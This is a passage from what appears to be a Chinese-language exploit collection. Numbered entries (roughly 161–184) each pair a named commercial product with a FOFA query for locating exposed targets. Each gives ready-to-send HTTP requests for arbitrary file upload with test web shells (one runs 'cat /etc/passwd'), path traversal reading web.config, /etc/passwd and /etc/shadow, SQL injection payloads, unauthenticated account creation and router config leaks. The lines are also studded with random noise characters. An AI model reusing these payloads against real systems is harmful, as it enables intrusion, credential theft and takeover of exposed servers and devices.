3 [* S! f/ A' J<soap:Envelope xmlns:xsi="- b! n% B$ |" j% N' h7 C
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" G# M6 T5 I. I y8 r" m2 V- x
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" B: c0 O, N9 K0 G<soap:Body>6 {. l4 x0 I& x
<UploadResume xmlns="http://tempuri.org/">
1 x7 E9 B6 c2 q) @- x<ip>1</ip>( h, o6 W4 m" E
<fileName>../../../../dizxdell.aspx</fileName>
; F) G3 s( Q& Z/ C; u<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>5 Q8 ]( E w, i1 ?: a( X! I1 L, v
<tag>3</tag>
2 I- t8 L! C8 |( f8 @/ j! ?' @( u</UploadResume>: C" ?3 d! M4 H# I0 I( O# d
</soap:Body>
4 c2 d3 \& ?7 H* s/ a/ G</soap:Envelope># G; M$ E; |$ [) j4 ^
; a8 R" V' y! ^9 @1 c( I3 g
5 k4 @- \/ s5 C( [http://x.x.x.x/dizxdell.aspx
% v* `9 t; ?& n8 s; A4 c% t- s
/ ]8 `( z9 N7 R l5 D162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
+ Z) }0 e' I; I0 e5 SFOFA: app="和丰山海-数字标牌"
7 N" P+ B+ `" l: G4 \' s9 ]# gPOST /QH.aspx HTTP/1.1 h: p( }& b1 {; W2 {8 V
Host: x.x.x.x
; K# o1 T( ?/ k d7 o/ |& \" C# dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, n+ v0 y( W9 [+ a9 h$ AConnection: close: ^/ H" ?! l) z. J+ D
Content-Length: 5830 O8 t% K) B9 E2 U, _9 s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
" Q* ~/ a- o3 LAccept-Encoding: gzip1 z' g( X' x- T) \3 `( u" y
+ a$ C2 P# C7 I/ X4 z+ T
------WebKitFormBoundaryeegvclmyurlotuey; ~7 m6 [" k# O
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
7 E4 M+ p2 ^2 J" z! f' BContent-Type: application/octet-stream
: x5 s, F: _2 Q# }+ r8 s9 m0 j9 f& \
) h, b/ V; j- @% T$ X' Z<% response.write("ujidwqfuuqjalgkvrpqy") %>8 U- i q v' Z3 r, v8 _5 e; u4 I+ r7 p
------WebKitFormBoundaryeegvclmyurlotuey
0 B: H4 l6 @! v2 [/ TContent-Disposition: form-data; name="action"
/ R n. g% b2 H. a' {5 `8 ], _- K" p; A- {
upload
" [4 b# Y8 c( _------WebKitFormBoundaryeegvclmyurlotuey8 s8 m/ @8 P' e$ S
Content-Disposition: form-data; name="responderId"
9 z$ Y( x0 N( }$ m( x0 F$ ?( Q. a( H
ResourceNewResponder
. P% e( r" d- c5 V9 `5 y9 c, Y------WebKitFormBoundaryeegvclmyurlotuey
- C4 n8 K& j" RContent-Disposition: form-data; name="remotePath". z; a7 w1 ?- t2 k1 J0 T
! d. R( j) g( D! i* N, B. M+ C ?+ l5 P/opt/resources
9 ^$ |) p+ |0 K" a! c7 G8 V: K------WebKitFormBoundaryeegvclmyurlotuey--5 A. a2 J( H7 j$ ^& }/ F E- A' O# ]
( L7 x: S; E; p- @9 J& L9 h6 R) x5 z# o
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
a0 t( L- b5 N# S/ |9 E# R
9 I# l K$ b: ^* ?) Q. q5 u; K2 x163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
5 Z) E. {- D! c. D- X8 _8 SFOFA: icon_hash="-795291075"
, \9 ?1 j3 C0 R3 d6 iPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
* r4 y" k7 h, h& z8 i: g9 ?Host: x.x.x.x
- H) }6 F1 {5 |; K2 Z, V& uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.361 s. W% U8 T* n+ \9 G- F) z8 r
Connection: close( W+ z/ I) e* n' ^ l, f/ W9 W
Content-Length: 2935 p6 n0 h; T" C8 d
Accept: */*( ~$ A, z1 U& m; X: Z3 c" q
Accept-Encoding: gzip, deflate5 z& h- E' A3 P6 R0 c0 A7 W
Accept-Language: zh-CN,zh;q=0.9
H; A+ C: Z. A( R8 g$ IContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
: }( ?7 `$ v" t4 g/ z+ C: A: U2 G
/ h% V' f n+ L3 r' q+ m------iiqvnofupvhdyrcoqyuujyetjvqgocod
- q/ l# _9 ]0 a: X) F8 w0 lContent-Disposition: form-data; name="name"1 M* |% m- Q x: k
3 r! I& i/ q3 G) ]- b
1.php
2 X3 b* P1 S( x: D( w N( F- x% p2 ?( _' b------iiqvnofupvhdyrcoqyuujyetjvqgocod
! D& ]3 J0 W) r# f8 N/ b1 B6 b0 P) eContent-Disposition: form-data; name="upfile"; filename="1.php"
! w6 E5 m! a6 rContent-Type: image/jpeg
$ G. S6 i: ], c6 Z0 E: k$ Y. H4 a# U4 J. u- o
rvjhvbhwwuooyiioxega3 d K q s1 F1 `$ d
------iiqvnofupvhdyrcoqyuujyetjvqgocod--+ ~, N4 Z0 |! \4 G
9 _2 b5 u* b N- F; y% G% o! V9 \
8 { [9 k% e. i9 p+ y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
2 S6 @& o7 p& [" L% T/ hFOFA: title="智慧综合管理平台登入"
8 [8 i/ M% [5 ]* p/ L8 F/ ^POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1# ?$ g! R6 o' Y- A
Host: x.x.x.x/ j/ v) X, u% A9 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
9 o/ b2 Q' W/ \- @+ F- @. V" `( ZContent-Length: 2887 I5 S% B8 Z2 J! {- E: h
Accept: application/json, text/javascript, */*; q=0.01
. ]0 n/ `9 @) V9 d, k3 O" u0 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
' ?+ P$ I4 \2 c; H3 RConnection: close. X# \, u. K7 V/ w) P1 L5 C. f P# Y
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl$ \# h: @+ l% S8 b
X-Requested-With: XMLHttpRequest
4 _/ o0 B4 p# r& A0 g) ^Accept-Encoding: gzip& h6 r. W! [* N/ X- _7 i: v) n
2 _+ U, Z7 ]. h( I3 n4 J------dqdaieopnozbkapjacdbdthlvtlyl
3 V( ^2 N5 C2 v' O' ^/ A' OContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
2 Q; H& e- D) y2 M7 K6 N# DContent-Type: image/jpeg+ K- h) L9 h* j; Y3 G* y
7 R& ~; k. ?! f1 R) D0 i/ o<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 Q z8 G+ K# H z& e& ]: Y------dqdaieopnozbkapjacdbdthlvtlyl--
, e+ F6 ]6 o/ l$ r
% A6 D% u1 g6 A$ }' {) `' g; a4 b* _( T7 w
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx" n0 w3 }3 B- j7 A
' w. U- }, M! G% a$ ^/ t9 e165. OrangeHRM 3.3.3 SQL 注入
( n1 P/ w! H' e: W; e- TCVE-2024-36428! ?, l& n% ^7 V1 o! u( A
FOFA: app="OrangeHRM-产品"- J: r/ a. V p. @/ i6 F w
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
, m) ^# y; F g9 _$ I' R) x) Y# |9 ^6 |0 M' ~/ Q( m
6 D ]; ]" @) S' i8 @- Q166. 中成科信票务管理平台SeatMapHandler SQL注入
- W% T" ~ A XFOFA:body="技术支持:北京中成科信科技发展有限公司"3 s4 u" ^' e+ I
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
2 b6 X, n* q QHost:
% T }: d3 G* ]" A! U- RPragma: no-cache
9 V3 [6 y7 |: y) S" @6 KCache-Control: no-cache
- @7 Q' ^/ W/ _: i( f/ t7 kUpgrade-Insecure-Requests: 1" _+ e4 a4 M T: }+ _! R) H5 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
/ t! ]8 U& t, ~+ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ L' Y A1 I7 E; }! O. w( fAccept-Encoding: gzip, deflate
: H9 v/ t4 P/ e8 T- a$ yAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
: }1 v2 q0 r9 ~& Q' D/ o9 lCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE& f6 n' w+ O8 [( [
Connection: close
; K* @6 v1 x3 n5 q$ |Content-Type: application/x-www-form-urlencoded
- u, g8 r5 J; Y! V2 B {3 xContent-Length: 89
, m+ p% N9 e: S4 O' }* N. _5 a/ E q' X2 q& k3 K# W
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE7 {4 i' O0 p5 i; [
) x% H: i% x9 S. G$ K+ ~
9 {- f7 r" S2 m8 \; G) C" ?2 k- d r167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 d; ~* u- _$ W7 g8 A! s3 q" _FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
4 H t& _( V; \1 xGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.18 D8 H7 \0 Y e8 q
Host:- z2 _8 D+ _& ]. x4 C! _ _4 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 |/ J! B: B J$ r, U) M% M& ~
Content-Type: application/x-www-form-urlencoded
8 V- c8 s' f7 v/ d6 l3 HAccept-Encoding: gzip, deflate
7 V9 Z3 T; h$ {Accept: */*
* |6 j( C- L2 T. gConnection: keep-alive
- T+ m; _& P: U% z5 [: m
! c- P6 d: U/ f$ a2 ~0 |: L
* I1 M& \* P2 u# y: t; ^9 p168. 宏景EHR OutputCode 任意文件读取# A& ?% O6 K; T
FOFA:app="HJSOFT-HCM". `4 S5 j0 `) s7 X
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
0 I' r" S0 p% q# MHost: your-ip8 b" y+ v8 ~. t2 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36* i% m7 Z0 m$ V, u8 a# ^$ S
Content-Type: application/x-www-form-urlencoded/ ?1 r9 f; s7 X; M4 x
Connection: close. k7 O9 i, h+ D& W6 u+ ?- _/ f
$ \; p! K2 F; V& @. d4 p
( C. d% }; K9 Z" I' o& `8 q; z9 R( E0 _% ]; E; p2 J
169. 宏景EHR downlawbase SQL注入' O5 a8 J3 O$ @4 [; o9 I! d9 M
FOFA:app="HJSOFT-HCM"
( U0 y$ ] D7 ZGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
; T* o [+ |* J, h$ aHost: your-ip
2 h8 E: K O O8 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* Q6 z2 F+ }& q8 b- e- hAccept: */*' q! I) X" x$ m. N& k
Accept-Encoding: gzip, deflate
+ W" P$ C B6 n$ d3 LConnection: close. x, b1 N5 \+ r5 R! t& i
9 Z/ Q( f! S" m4 i$ W4 ?: T0 _! m3 \% r- x t5 J/ k$ O1 i, e4 I/ c! g
8 q2 v0 P5 {' K) G- L6 c170. 宏景EHR DisplayExcelCustomReport 任意文件读取
& ?- ^4 c* Z$ D! AFOFA:body="/general/sys/hjaxmanage.js"
! C" Y2 N. P5 H+ n+ kPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 B2 W8 i3 x: t: _8 T& U6 P
Host: balalanengliang
" P" t: u; v- d) w1 LUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 ^/ V" q- K- k9 S
Content-Type: application/x-www-form-urlencoded
- Y- O: {# z# G. l% ~4 N( v) [* C0 }' A. \/ \; C c$ X. M0 f
filename=../webapps/ROOT/WEB-INF/web.xml
" d. _3 w9 p+ w( H
* j2 O% f' d& w {, ]/ l8 c+ t# F) A3 B! K$ E6 G0 y
171. 通天星CMSV6车载定位监控平台 SQL注入
$ M2 q/ i0 \8 n- bFOFA:body="/808gps/"" n9 U1 K4 R f
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.11 x, }; Z6 ~$ _- B# D& t
Host: your-ip
$ l# U( i: l; ]( Z. N" sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
6 s$ N: I% s$ WAccept: */*5 b$ o% k' a, l, V* C, X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 r) n# c/ \' E" O SAccept-Encoding: gzip, deflate
+ _- e$ z- K; f& m* J. EConnection: close
) z$ T Y7 }% _# a6 t
5 B- y: B: \0 E$ w$ O5 `
. c e& z, S7 ` n8 I8 N8 L) Z7 P( r' ^: L+ @
172. DT-高清车牌识别摄像机任意文件读取. [, k; q7 g4 N: S/ F" \/ ~
FOFA:app="DT-高清车牌识别摄像机"
9 B0 M2 V' U6 e. D. e" VGET /../../../../etc/passwd HTTP/1.1/ U$ x7 _. a+ C B7 x- T# S- d
Host: your-ip
i- f1 l( I1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" }# }. v6 ]2 ]$ y. R) a) n8 D" tAccept-Encoding: gzip, deflate
1 X3 o" L7 m" T+ U+ ^9 pAccept: */*( f5 k6 h, Z' D( X
Connection: keep-alive7 y) G) T, r& d2 v
' { @) J' H" C: W2 B3 Z
* r/ c. B! T8 E; a& V
- |/ o2 t% C2 Y" X
173. Check Point 安全网关任意文件读取5 k' {% Q* t/ b5 |0 Y7 K# e2 J1 J! R
CVE-2024-24919% ?5 I. I2 s# [! j' v
FOFA:app="Check_Point-SSL-Network-Extender": h# O6 t0 e; S8 v
POST /clients/MyCRL HTTP/1.1+ m& w6 M$ V; B: T; w, A& U! o
Host: your-ip0 T+ L( A% x0 {
Content-Type: application/x-www-form-urlencoded4 q/ N/ Z9 p$ a+ @1 w+ A# F: J
3 r% A9 Z( X# Z% q& U( i
aCSHELL/../../../../../../../etc/shadow9 v3 u u6 y0 o" S
3 A5 k6 C4 V. H5 @
0 k3 R' r; A* Z d% C* p1 S+ m) G& _) f8 | Y( h: r
174. 金和OA C6 FileDownLoad.aspx 任意文件读取- t% ~1 } [% e! Y1 f- j$ ^8 C
FOFA:app="金和网络-金和OA"
/ G7 H4 F- h+ g$ Y' P8 q& nGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
# S5 _' Y; y' Z; lHost: your-ip
* a+ _2 C. Q8 E9 |3 ~1 Y. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 H9 O g) H2 Z0 k2 R; e, e, FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 a- _, B' a' mAccept-Encoding: gzip, deflate, br/ W- I# E \4 L$ b7 \, [$ [9 \6 K
Accept-Language: zh-CN,zh;q=0.9# S# ?& N! f' C2 f: z
Connection: close
3 g8 a4 h$ i7 q* [7 } y# W
, ^0 @) F9 |% R$ T B# O$ H' M# k0 t! P( Y) }, U
! d K2 M5 o7 E4 `( ?+ n4 w" ?& `
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; l$ m) C' H8 CFOFA:app="金和网络-金和OA"0 C8 p2 s4 ~" k# u/ w
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.14 q3 C7 |$ W* |3 u P- c
Host:
) B' P5 B# V% C# |User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( S8 U# a$ d$ K1 r" d- `) U) |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 p, P7 V' a+ J( `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 `- l3 S5 B* i0 ]% VAccept-Encoding: gzip, deflate0 u' |0 T! H( K6 H7 H6 w" b5 v
Connection: close
5 P- G2 b& t x) S2 ^: _Upgrade-Insecure-Requests: 1, U- i# R# s, R* M, I
) q& D$ u- D; b0 G: L! K0 P) f
T. D, L o, Q; F; j9 ?% f* p176. 电信网关配置管理系统 rewrite.php 文件上传* A" T' R% {# e& {6 A
FOFA:body="img/login_bg3.png" && body="系统登录"
~6 @7 G: h$ q0 o/ f! qPOST /manager/teletext/material/rewrite.php HTTP/1.13 y5 k; N7 c0 A4 X) \
Host: your-ip
& ]6 \) D+ u0 p2 n4 z. f# UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 L6 U6 }; L- s1 O) a7 [$ ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
. i) Q% v7 P8 s. l1 C3 ?Connection: close
& w2 F% Y b( q" F A9 j% p2 j# m! ^" ]# J+ V2 ]
------WebKitFormBoundaryOKldnDPT8 ~% A7 Z1 H/ Y0 Q# }7 a* ]
Content-Disposition: form-data; name="tmp_name"; filename="test.php"! x* C5 p; b$ M. V$ [4 o
Content-Type: image/png. q2 y) C S& X' _# q$ B
& c# y9 p* E) c! G, u/ \<?php system("cat /etc/passwd");unlink(__FILE__);?>
Q O, |/ p' E/ T( V------WebKitFormBoundaryOKldnDPT
- r' P. v" Q8 w0 c- {9 mContent-Disposition: form-data; name="uploadtime"
6 ^6 F& ~# \3 `! y/ f( l( i$ x4 e
: F6 S$ d! h9 ^, W8 O/ n# {
- @4 R& M4 j; E1 W------WebKitFormBoundaryOKldnDPT--
9 h7 m: w, y: I& n6 q% \0 D
/ O4 ~7 ~7 d2 J, J0 h8 ~: q3 G. [( G& v8 G
+ R+ x& c4 f! R* i/ v; I9 ~. L
177. H3C路由器敏感信息泄露
" K' v) T% g$ w1 @) u/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
% d2 j; K% @6 d$ B' i/ Y; o1 H. o/userLogin.asp/../actionpolicy_status/../M60.cfg& g4 a- d+ ^' K# u
/userLogin.asp/../actionpolicy_status/../GR8300.cfg5 }$ }- M- T& t; M
/userLogin.asp/../actionpolicy_status/../GR5200.cfg+ _1 F" Z9 b1 s f- S$ W8 v( l
/userLogin.asp/../actionpolicy_status/../GR3200.cfg" y% o3 q, x7 t# M S2 R4 F2 Z1 F
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
9 F! D5 [; u, Y0 v Q/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/ l" |& M" z# `; j/ r2 E* b: k/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
2 d5 H6 b2 z* D/ N/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
2 N- h# @8 U [6 j& p/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
; D: y9 ]% V) K- \ Z. h+ {! w' H: L/userLogin.asp/../actionpolicy_status/../ER5200.cfg4 F' Y* U) p! R& p0 r p% A
/userLogin.asp/../actionpolicy_status/../ER5100.cfg8 M* B: t, y; i% z. |1 ^
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg% M3 S- [& c: c6 R; Y% }% C
/userLogin.asp/../actionpolicy_status/../ER3260.cfg) Y i! y! _7 N# ^/ {
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg. @: h3 \6 Z' F2 O' u
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
, d9 I5 v+ ]& y. g/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
6 V' l. p( D8 C4 K/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
$ j; x8 A, n! `5 d9 A/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
3 P. i6 U7 V: h4 [- Q/userLogin.asp/../actionpolicy_status/../ER3100.cfg) g) `: q2 i, x. k, H
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg* e- S0 C% V0 \4 p& \' e( U+ v* {' W3 T
& O' H/ S3 T3 U; X4 r
6 j6 }3 g0 o" q6 ?( f) t178. H3C校园网自助服务系统-flexfileupload-任意文件上传
" d' R* \ @" _$ ]( ~" ?# |FOFA:header="/selfservice"& q3 d" }) T* p5 W
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
* L; f, F8 o) [- {Host:
/ q9 s* K5 T1 G3 v3 {0 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 y0 M! X8 ]9 s, P8 H+ l/ o- q0 s
Content-Length: 252) c6 m! e/ n! F: e: W' J4 [( ^
Accept-Encoding: gzip, deflate. u1 E& V% u/ e. l" ]: \7 S2 |
Connection: close
3 L1 Q; {1 y8 R) }3 q- LContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l7 }* e) b2 _ ^9 w
-----------------aqutkea7vvanpqy3rh2l9 I1 r% J0 r0 V: A
Content-Disposition: form-data; name="12234.txt"; filename="12234"% ^- d* c b) m
Content-Type: application/octet-stream/ n1 [ e* I2 |" y" H$ J$ Y
Content-Length: 255
' p+ Q- q5 d a7 D+ q* Z# _
4 S+ g+ H" n6 Z# e. c5 c/ g122343 O, N; v& F7 a/ h3 ]
-----------------aqutkea7vvanpqy3rh2l--2 t! j' q6 `; {4 h* t
2 O: \: _8 k1 U% e
1 E" @+ W8 j: m" b- q8 lGET /imc/primepush/%2e%2e/flex/12234.txt: W4 n, E$ k( R. A2 R' w$ L
% D: l: L) ?/ b* X
% V. p* G* o) F8 o" u9 J3 h# S) j
179. 建文工程管理系统存在任意文件读取
- q! y6 ?0 M. Q! L/ I$ j) r" HPOST /Common/DownLoad2.aspx HTTP/1.1* d7 N5 |! C9 k8 }/ L1 O
Host: {{Hostname}}5 J0 s% K% j3 c3 }- r: _ B
Content-Type: application/x-www-form-urlencoded4 [7 D! q& K [1 m2 J! Z- e
User-Agent: Mozilla/5.0
. [& G0 ~7 R( f9 V+ g" I1 E. e" C0 I$ f- Q* H
path=../log4net.config&Name=
' a" n0 y3 M) P
# G% R: b# E9 _# D8 q: A4 m/ ^% s2 U3 d* G, P! g
180. 帮管客 CRM jiliyu SQL注入
8 r- w) ?5 i7 x G! Y) P: J8 |/ gFOFA:app="帮管客-CRM"2 e H6 a7 Z5 B& V8 ~6 G
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.11 [" ?1 n; T- c
Host: your-ip0 ?: v( C3 J0 n$ j" J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: k. a. N9 a$ B8 @9 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! U- `1 U5 p; P' A& `5 O+ gAccept-Encoding: gzip, deflate: @- Q; f9 y: ~3 W4 E% J
Accept-Language: zh-CN,zh;q=0.9
/ p, ^" ]7 y2 o |1 Z" @7 F& cConnection: close8 V. p' S- k8 [3 I. c4 Q9 _; v5 h
3 ~" V3 `* J. P
2 ]$ u5 d! Q _' n3 y! O) ~
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
. I7 Y. D, ^$ o8 a% y K! rFOFA:"PDCA/js/_publicCom.js"
f0 V( r0 I5 ]1 d* {% q1 X2 n) XPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1% K2 ?6 J- B4 R% i/ ]; e
Host: your-ip% T0 p( F }- D9 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 x3 J3 r0 X0 t- w) FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, S' ~8 ~2 A% P) v3 A! X$ _
Accept-Encoding: gzip, deflate, br: c2 u) U9 ]3 B4 |* P H$ n# C
Accept-Language: zh-CN,zh;q=0.9
( t- p1 O; @2 b) L' `Connection: close
6 y+ Q. S) z; X" t2 s8 \Content-Type: application/x-www-form-urlencoded% l/ \% |" l- E4 A( O0 x$ _" H( v
8 `' }2 j7 ~5 ]3 ], l+ k: N% H9 C
" w G5 D. P% @6 Z, Q- p- _7 P0 daction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20+ F4 W4 v) W' w( H2 u% C
" t. C; _ a# r0 t f3 E. ^0 ?1 A1 o. b
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 H J8 T" u8 I0 U2 p( nFOFA:"PDCA/js/_publicCom.js"6 y% w) j8 Q& O8 G" x! } b
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
+ h' y4 C4 X+ S6 B# mHost: your-ip! A, B/ D. y$ ]( u' N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: i" l0 Y3 A) T/ J2 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 g4 b, u. |/ X& t# {
Accept-Encoding: gzip, deflate, br
6 U* P0 a# y6 n. g7 h8 ^) l$ e: |$ QAccept-Language: zh-CN,zh;q=0.9, Z- v9 s& ^& b) U% d% S
Connection: close3 J; m2 T C5 t/ X Y7 q! W
Content-Type: application/x-www-form-urlencoded9 ?6 d$ I; _' O0 C, a
$ O g/ C8 c `1 {$ w! s) e0 D1 S
username=test1234&pwd=test1234&savedays=1
7 T, G3 B9 j1 \! @9 j
: O! X- P( y w! d- P1 h! w0 q
/ L( T. ~' E5 S& s183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
/ s% G' {0 Z' M, q8 z7 j4 g, U1 jFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"( Q5 p6 G: A8 ~/ A" p2 F! }
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.19 J% I3 i( m& [( g5 u0 {; s
Host: your-ip, j9 o+ t# C* V0 ^
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 G8 Q+ h+ H* r0 B! `5 j7 @
Accept-Charset: utf-8) F$ l7 z& f9 R3 ~7 D1 A) C
Accept-Encoding: gzip, deflate/ ?2 A: `; B8 E, t( O. w
Connection: close& [4 a1 O$ x) \0 V7 l
j: x# l' ?* ?4 K
* K7 Q! `& B( e2 r+ K1 }7 @184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) e& p/ J: N$ A* h3 [+ A0 D
FOFA:server="SunFull-Webs"
6 ?4 h- u0 z! h/ h7 ^POST /soap/AddUser HTTP/1.1- k, M! A0 W9 c2 H- m. n7 _4 w
Host: your-ip V1 b' _6 z R2 \ t
Accept-Encoding: gzip, deflate6 _* S4 `# V! I3 Z9 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- l; g r' F- Z) R, }- h/ ~/ ]* I, z* _
Accept: application/xml, text/xml, */*; q=0.019 ~+ f/ {8 H, U$ `* b8 S& C# c8 T
Content-Type: text/xml; charset=utf-84 j6 R6 M$ I& v
